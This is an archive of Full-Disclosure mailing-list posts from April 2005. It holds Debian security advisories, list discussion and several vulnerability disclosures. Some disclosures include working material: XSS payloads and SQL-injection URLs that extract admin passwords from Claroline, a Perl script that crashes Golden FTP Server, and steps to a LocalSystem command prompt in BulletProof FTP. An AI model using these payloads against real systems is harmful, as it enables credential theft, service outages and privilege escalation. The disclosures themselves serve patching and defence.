[Full-disclosure] [SECURITY] [DSA 715-1] New cvs packages fix unauthorised repository access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 715-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze April 27th, 2005http://www.debian.org/security/faq - -- Package: cvs Vulnerability : serveral Problem-Type : remote Debian-specific: yes CVE IDs: CAN-2004-1342 CAN-2004-1343 Debian Bug : 260200 Several problems have been discovered in the CVS server, which serves the popular Concurrent Versions System. The Common Vulnerability and Exposures project identifies the following problems: CAN-2004-1342 Maks Polunin and Alberto Garcia discovered independently that using the pserver access method in connection with the repouid patch that Debian uses it is possible to bypass the password and gain access to the repository in question. CAN-2004-1343 Alberto Garcia discovered that a remote user can cause the cvs server to crash when the cvs-repouids file exists but does not contain a mapping for the current repository, which can be used as a denial of service attack. For the stable distribution (woody) these problems have been fixed in version 1.11.1p1debian-10. For the unstable distribution (sid) these problems have been fixed in version 1.12.9-11. We recommend that you upgrade your cvs package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10.dsc Size/MD5 checksum: 683 59823fd39bbbe16620d03a946936885c http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10.diff.gz Size/MD5 checksum:55952 02e1d3ce442838837defa5952f548582 http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian.orig.tar.gz Size/MD5 checksum: 2621658 500965ab9702b31605f8c58aa21a6205 Alpha architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_alpha.deb Size/MD5 checksum: 1179144 9282b85f488096912601c02110ff40ad ARM architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_arm.deb Size/MD5 checksum: 1106418 270ed04648a240ffe138c53dcc21e23f Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_i386.deb Size/MD5 checksum: 1085370 a6a9d6e768bf94ff2d73f7c4297b4bfe Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_ia64.deb Size/MD5 checksum: 1272522 843265de87691b70f7f3791b1de14787 HP Precision architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_hppa.deb Size/MD5 checksum: 1148284 7e28816777f07485cffcf2065e948c1d Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_m68k.deb Size/MD5 checksum: 1066564 62613fcbc6eddef7b4eb6103ef5849ae Big endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_mips.deb Size/MD5 checksum: 1130690 a0b311ef90ea76653c119c729e6d9c79 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_mipsel.deb Size/MD5 checksum: 1132148 e818238493b1b589410f802fc4166702 PowerPC architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_powerpc.deb Size/MD5 checksum: 1117054 887d8a61fc0f66bba26125aca927b6f4 IBM S/390 architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_s390.deb Size/MD5 checksum: 1097842 43799198fefec02e443e065d839b5530 Sun Sparc architecture: http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_sparc.deb Size/MD5 checksum: 1107744 a6cf45a0ea45609b1e1e9e381ec0b62e These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and
[Full-disclosure] [SECURITY] [DSA 716-1] New gaim packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 716-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze April 27th, 2005http://www.debian.org/security/faq - -- Package: gaim Vulnerability : denial of service Problem-Type : remote Debian-specific: no CVE ID : CAN-2005-0472 It has been discovered that certain malformed SNAC packets sent by other AIM or ICQ users can trigger an infinite loop in Gaim, a multi-protocol instant messaging client, and hence lead to a denial of service of the client. Two more denial of service conditions have been discovered in newer versions of Gaim which are fixed in the package in sid but are not present in the package in woody. For the stable distribution (woody) this problem has been fixed in version 0.58-2.5. For the unstable distribution (sid) these problems have been fixed in version 1.1.3-1. We recommend that you upgrade your gaim packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5.dsc Size/MD5 checksum: 681 e985a045131d5ad43c2192533d581d49 http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5.diff.gz Size/MD5 checksum:23078 688d4d51bd00e863c4c911f539708f0d http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58.orig.tar.gz Size/MD5 checksum: 1928057 644df289daeca5f9dd3983d65c8b2407 Alpha architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_alpha.deb Size/MD5 checksum: 480588 297fed5e44fab4f49c3c103159ee3dc4 http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_alpha.deb Size/MD5 checksum: 674918 1a59dbf94b98f25c18eaeee28aab5910 http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_alpha.deb Size/MD5 checksum: 501450 bbe7cdac070bed0937596df34052c555 ARM architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_arm.deb Size/MD5 checksum: 401938 1f9588d2015c20477f35f59de2e67190 http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_arm.deb Size/MD5 checksum: 615258 6a1d88825004fb405881674236b5f34b http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_arm.deb Size/MD5 checksum: 422646 eab79e46b080475268510509635388b2 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_i386.deb Size/MD5 checksum: 389530 e4b3815727835a3ab112fb109a328021 http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_i386.deb Size/MD5 checksum: 605678 619283e7b98add8bf725beb71a3de75b http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_i386.deb Size/MD5 checksum: 409274 c81aa5abd01455d0b082c6503e5abb32 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_ia64.deb Size/MD5 checksum: 557214 f57cd6a3c35d2d7042690e5584d3c49c http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_ia64.deb Size/MD5 checksum: 765410 33b7051caea6919c87519bc9c570ef69 http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_ia64.deb Size/MD5 checksum: 570064 2a9d5dbdd9b1bc7470d3a7a12cf3b453 HP Precision architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_hppa.deb Size/MD5 checksum: 459698 74a1621f52f73e436aeffc82e1c528a5 http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_hppa.deb Size/MD5 checksum: 691344 06a88c54e725114cb0818b50dce65fd5 http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_hppa.deb Size/MD5 checksum: 481568 5aaf2370d855711ae2d2916c13831f0b Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_m68k.deb Size/MD5 checksum: 370690 627841728dabb3c6e83e60c8001a0ac4 http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_m68k.deb Size/MD5 checksum: 622818 e4205658f157914fc5cea27c7248a71d http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_m68k.deb Size/MD5
Re: [Full-disclosure] (no subject)
Man, ppl are such crybabies! --- Paul Schmehl [EMAIL PROTECTED] wrote: --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski [EMAIL PROTECTED] wrote: Could we can the nazi rhetoric in messages on this list? Or can we just complain until the list loses its hosting? That makes a great deal of sense. One poster sends stuff you find offensive, so you want to shut down the entire list? Yeah, makes perfect sense. Next you'll tell us you're going to take your ball and go home. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft
Hi, Im also trying to report a vulnerability to Microsoft but the site they provide is broken when i fill out and send https://www.microsoft.com/technet/security/bulletin/alertus.aspx I get: Were sorry, but we were unable to service your request. You may wish to choose from the links below for information about Microsoft products and services. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Kevin Sent: 27 April 2005 00:11 To: Microsoft Security Response Center Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft On a related note, today we ran into (headfirst) a bug in Internet Explorer with the processing of a AutoProxy scripts (Proxy Automatic Configuration aka PAC, a specialized subset of javascript to make client-side web proxy routing decisions). Eventually I isolated the problem to a broken implementation of dnsDomainIs() in Internet Explorer, so I decided to do the right thing and report the bug to Microsoft. This isn't a higly critical security flaw, so I hunted around microsoft.com and eventually found the page on bug reporting: http://support.microsoft.com/gp/contactbug The page states If you think you have found a bug in a Microsoft product, contact our Microsoft Product Support Services department. (800) MICROSOFT (642-7676). No email address, no web form, just a phone number. So I call this number, and after five minutes of sitting through IVR menus, I finally reach a live human. She asks for my name and phone number, and as soon as I mention that I am reporting a bug in Internet Explorer, says she will transfer my call. At that point I get fifteen seconds of music on hold, followed by dead air. That was a half hour ago. Kevin Kadow (P.S. Yes, this is definitely a bug in MSIE -- every other browser I've tried handles dnsDomainIs() correctly, the sole exception is MSIE). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] How to Report a Security Vulnerability toMi crosoft
See http://www.mckeay.net/secure/archives/000422.html An email to [EMAIL PROTECTED] should do the trick. Cheers, Phil Phil Randal Network Engineer Herefordshire Council Hereford, UK -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary O'leary-Steele Sent: 27 April 2005 14:16 To: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft Hi, Im also trying to report a vulnerability to Microsoft but the site they provide is broken when i fill out and send https://www.microsoft.com/technet/security/bulletin/alertus.aspx I get: We're sorry, but we were unable to service your request. You may wish to choose from the links below for information about Microsoft products and services. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Kevin Sent: 27 April 2005 00:11 To: Microsoft Security Response Center Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft On a related note, today we ran into (headfirst) a bug in Internet Explorer with the processing of a AutoProxy scripts (Proxy Automatic Configuration aka PAC, a specialized subset of javascript to make client-side web proxy routing decisions). Eventually I isolated the problem to a broken implementation of dnsDomainIs() in Internet Explorer, so I decided to do the right thing and report the bug to Microsoft. This isn't a higly critical security flaw, so I hunted around microsoft.com and eventually found the page on bug reporting: http://support.microsoft.com/gp/contactbug The page states If you think you have found a bug in a Microsoft product, contact our Microsoft Product Support Services department. (800) MICROSOFT (642-7676). No email address, no web form, just a phone number. So I call this number, and after five minutes of sitting through IVR menus, I finally reach a live human. She asks for my name and phone number, and as soon as I mention that I am reporting a bug in Internet Explorer, says she will transfer my call. At that point I get fifteen seconds of music on hold, followed by dead air. That was a half hour ago. Kevin Kadow (P.S. Yes, this is definitely a bug in MSIE -- every other browser I've tried handles dnsDomainIs() correctly, the sole exception is MSIE). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** ** ** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ** ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft
they have pubbed theire contact some days ago: [EMAIL PROTECTED] Gary O'leary-Steele a crit : Hi, Im also trying to report a vulnerability to Microsoft but the site they provide is broken when i fill out and send https://www.microsoft.com/technet/security/bulletin/alertus.aspx I get: Were sorry, but we were unable to service your request. You may wish to choose from the links below for information about Microsoft products and services. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Kevin Sent: 27 April 2005 00:11 To: Microsoft Security Response Center Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] How to Report a Security Vulnerability toMicrosoft On a related note, today we ran into (headfirst) a bug in Internet Explorer with the processing of a AutoProxy scripts (Proxy Automatic Configuration aka PAC, a specialized subset of javascript to make client-side web proxy routing decisions). Eventually I isolated the problem to a broken implementation of dnsDomainIs() in Internet Explorer, so I decided to do the right thing and report the bug to Microsoft. This isn't a higly critical security flaw, so I hunted around microsoft.com and eventually found the page on bug reporting: http://support.microsoft.com/gp/contactbug The page states If you think you have found a bug in a Microsoft product, contact our Microsoft Product Support Services department. (800) MICROSOFT (642-7676). No email address, no web form, just a phone number. So I call this number, and after five minutes of sitting through IVR menus, I finally reach a live human. She asks for my name and phone number, and as soon as I mention that I am reporting a bug in Internet Explorer, says she will transfer my call. At that point I get fifteen seconds of music on hold, followed by dead air. That was a half hour ago. Kevin Kadow (P.S. Yes, this is definitely a bug in MSIE -- every other browser I've tried handles dnsDomainIs() correctly, the sole exception is MSIE). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: email attack vector just got wider
Right, but do the AV vendors recognize an encrypted/password-protected PDF - like the would/could a compressed archive (ZIP, etc) ? I haven't seen any that can. I'm using Symantec 9, and I'd be interested to know if anyone is using a competitor that addresses this issue directly. Thanks, On 4/26/05, Randall M [EMAIL PROTECTED] wrote: Just my 2cents worth. About the only defense is using programs such as MailSecurity to block and alert when anything is encrypted or password protected. thank you Randall M If we ever forget that we're one nation under God, then we will be a nation gone under. - Ronald Reagan _ From: [EMAIL PROTECTED] [mailto: [EMAIL PROTECTED]] On Behalf Of Micheal Espinola Jr Sent: Tuesday, April 26, 2005 11:56 AMTo: Full DisclosureSubject: [Full-disclosure] Re: email attack vector just got wider an update: My latest finding is that Adobe PDF's with embedded attachments can be bundled and distributed as aSecure Electronic Envelope (eEnvelope).eEnvelopes are designed to protect documents in transitwith the use of encryption. Password protected .ZIP's are typically addressed at the SMTP gateway by AV software with the option to strip or reject compressed file attachments that are not readily scan-able (due to the password protection, etc). Although Adobe recommends enabling scanning all file types in order to scan a PDF (and ass/u/me'ingits embedded contents as well),an AV scanner is not currently going to be able to scan this encrypted content until the content has been rendered/unencrypted at the desktop. While many AV vendors have factored certain compressed archive standards into their products, I have seen no indication that this is being addressed for this relatively new and already widely deployed product. Call me a worry-wort, but I foresee this is the next in for malware distribution. On 4/25/05, Micheal Espinola Jr [EMAIL PROTECTED] wrote: Perhaps not just. My apologies for those that are aware of this, but it seems Adobe 6 also had this capability - although many people have been unaware of this. I recently upgrade from 5 to 7, so I missed this potential issue from the get-go. Someone pointed out to me that Symantec does have a bulletin stating that by setting your AV to scan all files you can detect a virus inside a file embedded intoa PDF. Unfortunately, this does not address the blocking of certain attachments outright. On 4/25/05, Micheal Espinola Jr [EMAIL PROTECTED] wrote: It seems most people I know haven't noticed that the new version of Adobe Acrobat (7) now allows for embedded/attached documents. Since PDF's have generally been considered a safe document format and are typically not blocked by content/attachment scanners, this now opens anemail-based attack vector that anti-virus providers [to the best of my knowledge] are not currently addressing. Many thanks to Adobe for creating another issue for us to deal with, and especially for not having the forethought to coordinate with anti-virus vendors to prepare for assuredly future exploitation of the technology. -- ME2my home: http://www.santeriasys.net/my photos: http://mespinola.blogspot.com/ -- ME2my home: http://www.santeriasys.net/my photos: http://mespinola.blogspot.com/ -- ME2my home: http://www.santeriasys.net/my photos: http://mespinola.blogspot.com/ -- ME2http://www.santeriasys.net/photography: http://mespinola.blogspot.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZRCSA-200501 - Multiple vulnerabilities in Claroline
Zone-H Research Center Security Advisory
200501http://fr.zone-h.org
Date of release: 27/04/2005
Software: Claroline (www.claroline.net)
Affected versions: 1.5.31.6 beta1.6
Release Candidate 1(probably previous versions too)
Risk: High
Discovered by:Kevin Fernandez
"Siegfried"Mehdi Oudad "deepfear"from the Zone-H Research
Team
Background (from their web
site)--Claroline is an Open Source software based on PHP/MySQL.
It's a collaborative learning environment allowing teachers or education
institutions to create and administer courses through the web.
Description---Multiple Cross site
scripting, 10 SQL injection, 7 directory traversal and 4 remote file inclusion
vulnerabilities have been found in Claroline.
Details---
1)Multiple Cross site scripting vulnerabilities have been found in the
following
pages:claroline/exercice/exercise_result.phpclaroline/exercice/exercice_submit.phpclaroline/calendar/myagenda.phpclaroline/calendar/agenda.phpclaroline/tracking/user_access_details.phpclaroline/tracking/toolaccess_details.phpclaroline/learnPath/learningPathList.phpclaroline/learnPath/learningPathAdmin.phpclaroline/learnPath/learningPath.phpclaroline/tracking/userLog.php[..]
Examples:claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3Eclaroline/tracking/user_access_details.php?cmd=docdata="">claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E[..]
2)10 SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin, arbitrary teachers or
students.claroline/learnPath/learningPath.php
(3)claroline/tracking/exercises_details.phpclaroline/learnPath/learningPathAdmin.phpclaroline/tracking/learnPath_details.phpclaroline/user/userInfo.php
(2)claroline/learnPath/modules_pool.phpclaroline/learnPath/module.php
Examples:claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--[..]
3)Multiple directory traversal vulnerabilities in
"claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php"
could allow project administrators (teachers) to upload files in arbitrary
folders or copy/move/delete (then view) files of arbitrary folders by performing
directory traversal attacks.
4)Four remote file inclusion vulnerabilities have been discovered.
SolutionThe Claroline users are urged to update to version
1.54 or 1.6 final:http://www.claroline.net/download.htm
See also:http://www.claroline.net/news.php#85http://www.claroline.net/news.php#86
Timeline18/04 Vulnerabilities found22/04 Vendor
contacted (quick answer)25/04 Claroline 1.54 released26/04 Claroline 1.6
final released27/04 Users alerted via the mailing list27/04 Advisory
released
French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/English
version: http://www.zone-h.org/advisories/read/id=7472
Zone-H Research Centerhttp://fr.zone-h.org
Join us on #zone-h @ irc.eu.freenode.net
You can contact the team leader at [EMAIL PROTECTED]
Thanks to University Montpellier 2.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Maybe not a disclosure but request for information.
I work with a bunch of HS20 Blades in a 8677 Chassis and we are using the Qlogics cards (that was a mistake) connected to an IBM FAStT-900. Talking to IBM with regards to my problems (blade and san related versus personal!) I have found that there are known issues with the Qlogics cards. I do not know if this is a Qlogics, fAStT or combo issue, BUT one day you might be able to see your SAN the next day you reboot and you loose the SAN! Even without making any changes to the servers! I was told that this is a fairly common but non-repeatable as such Qlogcis and IBM have given up on finding a solution. Full disclosure elements working with QLogics and an IBM FAStT is a real pain in the rear! IBM wants tools on the servers to better build the qla2300.conf file, but those tools require that you have no firewall installed and port mapper has to be running so I do not do that. If I were to start this project over and if my voice carried any weight in the final choice I would say we are NOT going to use Qlogics because they are way to unreliable. QUESTION: I am trying to find list servers that might be able to answer my questions and since I am feeling lazy (after being unsuccessful with google thus far) I am asking here does anybody know of (a) list server (s) that fit the needs of managing a FASTtT in a Linux environment. IBM was fairly useless here as well. -- Leif Ericksen [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Maybe not a disclosure but request for information.
On Wed, 27 Apr 2005 12:18:56 CDT, Leif Ericksen said: cards. I do not know if this is a Qlogics, fAStT or combo issue, BUT one day you might be able to see your SAN the next day you reboot and you loose the SAN! OK. Now rephrase it as a computer security issue, so it's on-topic. We may drift off-topic on occasion, but what *vulnerability* is involved here, other than the fact that QLogics gear does a better job of fellating donkeys than actually doing what they were designed to do? pgpX3HCmb14IE.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDEFENSE Labs Releases dltrace
iDEFENSE Labs is pleased to announce the release of dltrace, a portable dynamic library call tracer. dltrace attempts to remain portable to all x86 platforms which support the execution of ELF binaries and expose a debugging interface via procfs or the ptrace() system call. The shared library call tracing is done at a level which allows all calls to all exported symbols in loaded libraries to be traced. In addition, dltrace does not rely on specific rtld exports to retrieve library and symbol information and is capable of determing function arguments dynamically via run-time disassembly. dltrace has been released as open source and is available for download from: http://labs.idefense.com Michael Sutton, Director, iDEFENSE Labs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Maybe not a disclosure but request for information.
Full Disclosure : My SAN's broken .. lol .. if only every company in the world were so honest about their downtime. It sounds like you're having a problem with redundant FC paths (when you setup a SAN with 2 cards per host, 2 switches, 2 controllers in the disk array, etc). When I worked with IBM's SAN gear at a former employer (we also used Qlogic cards) there was a ESS path manager software (exact name escapes me) that we had to download off IBM's website. It was a device driver that handled masking of the inactive path (to avoid seeing twice the drives due to diverse paths). We got it working on Windows and Solais but never on Linux. I should point out though that the qla[22|23|63]xx linux driver supports path diversity natively via the config file. However if you're booting off the FC drives (which, btw, isn't reccomended by IBM) the BIOS on the Qlogic card takes impossibly long (5-10min) while it tries to talk to the inactive path LUNs. This might help you to make a working qla2300.conf in linux for IBM's FASsT : http://dag.wieers.com/home-made/qla-autoconf/ Cheers, Michael Holstein CISSP GCIA Cleveland State University. Leif Ericksen wrote: I work with a bunch of HS20 Blades in a 8677 Chassis and we are using the Qlogics cards (that was a mistake) connected to an IBM FAStT-900. Talking to IBM with regards to my problems (blade and san related versus personal!) I have found that there are known issues with the Qlogics cards. I do not know if this is a Qlogics, fAStT or combo issue, BUT one day you might be able to see your SAN the next day you reboot and you loose the SAN! Even without making any changes to the servers! I was told that this is a fairly common but non-repeatable as such Qlogcis and IBM have given up on finding a solution. Full disclosure elements working with QLogics and an IBM FAStT is a real pain in the rear! IBM wants tools on the servers to better build the qla2300.conf file, but those tools require that you have no firewall installed and port mapper has to be running so I do not do that. If I were to start this project over and if my voice carried any weight in the final choice I would say we are NOT going to use Qlogics because they are way to unreliable. QUESTION: I am trying to find list servers that might be able to answer my questions and since I am feeling lazy (after being unsuccessful with google thus far) I am asking here does anybody know of (a) list server (s) that fit the needs of managing a FASTtT in a Linux environment. IBM was fairly useless here as well. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] hPRoTeCT Labs Releases vulnfind
hPRoTeCT Labs is pleased to announce the release of vulnfind, an
automated universal vulnerability discovery and exploitation
engine. vulnfind permits the universal and automated discovery of
vulnerabilities across all Windows XP platforms via the
instrumentation of shared library code responsible for virtually
all vulnerabilities. An advanced 'detours' hook library instruments
the shared library code responsible for 'strcpy', a major cause of
vulnerabilities, and notifies when the saved frame pointer and
return address ('ebp' and 'eip') will be compromised due to excess
string length. In addition, vulnfind permits vulnerability
discovery and penetration tests alike via run-time replacement of
the compromised return address ('eip') with an address of memory-
resident shellcode resident in the memory of the process.
vulnfind is released as open 'c' source and it will be ported to
'c++' in the coming weeks. vulnfind, along with over 250 other c,
cpp, cxx, and h files written by hPRoTeCT staff, is available via
the hPRoTeCT Labs home page, in addition to over 250 other
projects.
The availability of additional projects will be announced to all
mailing lists upon becoming available.
Wiley Miller
Product Manager, hPRoTeCT Labs
Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434
Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
Summary:
Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
(http://www.goldenftpserver.com/)
Details:
Passing an overly long username parameter to the FTP server causes the
EIP register to be overwritten after the USER/PASS login sequence is
completed. Once this has been done the FTP will either crash or
execute code (depending on the value of the username) when the server
statistics are viewed by an administrator.
Vulnerable Versions:
Golden FTP Server Pro v2.52 (10.04.2005)
Patches/Workarounds:
The vendor was notified of the issue. There was no response.
Exploit:
Run the following PERL script against the server. Afterward, right
click on the Golden FTP Server Pro icon in the Windows tray and click
Statistic. The process will die.
#= Start GoldenFTPServer_Overflow.pl =
#
# Usage: GoldenFTPServer_Overflow.pl ip
#GoldenFTPServer_Overflow.pl 127.0.0.1
#
# KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
#
# Download:
# http://www.goldenftpserver.com/
#
##
use IO::Socket;
use strict;
my($socket) = ;
if ($socket = IO::Socket::INET-new(PeerAddr = $ARGV[0],
PeerPort = 21,
Proto= TCP))
{
print Attempting to kill Golden FTP Server at $ARGV[0]:21...;
sleep(1);
print $socket USER . A x 332 . \r\n;
sleep(1);
print $socket PASS . \r\n;
close($socket);
}
else
{
print Cannot connect to $ARGV[0]:21\n;
}
#= End GoldenFTPServer_Overflow.pl =
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation in BulletProof FTP Server v2.4.0.31
Summary: Privilege escalation in BulletProof FTP Server v2.4.0.31 (http://www.bpftpserver.com/) Details: When the BPFTPServer service is installed and running as LocalSystem it is possible to manipulate the administrative interface and escalate privileges to that of the LocalSystem account. Vulnerable Versions: Privilege escalation in BulletProof FTP Server v2.4.0.31 Patches/Workarounds: The vendor was notified of the issue. There was no response. Exploit: 1. Right click the BulletProof FTP Server tray icon and click Show Server. 2. Click the Help icon. 3. Internet Explorer will open (running under the context of the LocalSystem account). Click File, Click Open. 4. Click Browse. 5. Change Files of type: to All Files, navigate to the system32 directory and locate cmd.exe. Right click cmd.exe and choose Open. The result is a command prompt running under the context of the LocalSystem account. Discovered by Reed Arvin reedarvin[at]gmail[dot]com (http://reedarvin.thearvins.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Privilege escalation and password protection bypass in Altiris Client Service for Windows (Version 6.0.88)
Summary:
Privilege escalation and password protection bypass in Altiris Client
Service for Windows (Version 6.0.88)
(http://www.altiris.com/)
Details:
It is possible to manipulate the administrative interface of the
Altiris Client Service for Windows and escalate privileges to that of
the LocalSystem account.
